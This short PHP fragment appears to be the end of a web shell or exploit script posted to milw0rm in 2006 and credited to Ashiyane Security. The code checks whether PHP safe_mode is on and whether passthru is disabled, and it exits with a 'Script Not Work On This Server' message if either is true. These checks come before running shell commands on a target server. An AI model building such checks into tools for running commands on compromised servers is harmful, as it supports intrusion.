
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
echo "
Sorry Safe-mode Is On ( Script Not Work On This Server )
";
echo "
Powered By Ashiyane Security Corporation www.Ashiyane.ir";
exit();
}
$disablef = @ini_get("disable_functions");
if (!empty($disablef))
{
$disablef = str_replace(" ","",$disablef);
$disablef = explode(",",$disablef);
if (in_array("passthru",$disablef))
{
echo "
Sorry Passthru Is Disable ( Script Not Work On This Server )
";
echo "
Powered By Ashiyane Security Corporation www.Ashiyane.ir";
exit();
}
}
?>
Powered By Ashiyane Security Corporation www.Ashiyane.ir
# milw0rm.com [2006-10-13]